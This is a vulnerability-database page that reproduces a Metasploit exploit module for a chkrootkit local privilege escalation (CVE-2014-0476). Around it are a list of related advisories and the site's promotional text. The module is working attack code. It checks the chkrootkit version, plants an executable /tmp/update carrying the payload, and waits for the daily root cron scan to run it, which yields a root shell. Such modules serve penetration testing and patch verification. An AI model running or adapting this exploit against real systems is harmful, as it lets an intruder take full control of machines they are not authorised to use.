Vulners
Lucene search
Chkrootkit Local Privilege Escalation
🗓️ 20 Nov 2015 00:00:00Reported by Thomas StangnerType 
packetstorm🔗 packetstormsecurity.com👁 42 Views
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | chkrootkit 0.49 - Local Root Vulnerability | 28 Jun 201400:00 | – | zdt |
| Chkrootkit Local Privilege Escalation Exploit | 20 Nov 201500:00 | – | zdt |
 | Important: chkrootkit | 9 Jul 201400:00 | – | amazon |
 | Amazon Linux AMI : chkrootkit (ALAS-2014-370) | 12 Oct 201400:00 | – | nessus |
| Debian DSA-2945-1 : chkrootkit - security update | 4 Jun 201400:00 | – | nessus |
| Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071) | 13 Jun 201400:00 | – | nessus |
| Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090) | 13 Jun 201400:00 | – | nessus |
| GLSA-201709-05 : chkrootkit: Local privilege escalation | 18 Sep 201700:00 | – | nessus |
| Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122) | 12 Jun 201400:00 | – | nessus |
| Ubuntu 14.04 LTS : chkrootkit vulnerability (USN-2230-1) | 5 Jun 201400:00 | – | nessus |
10
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2015 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.11441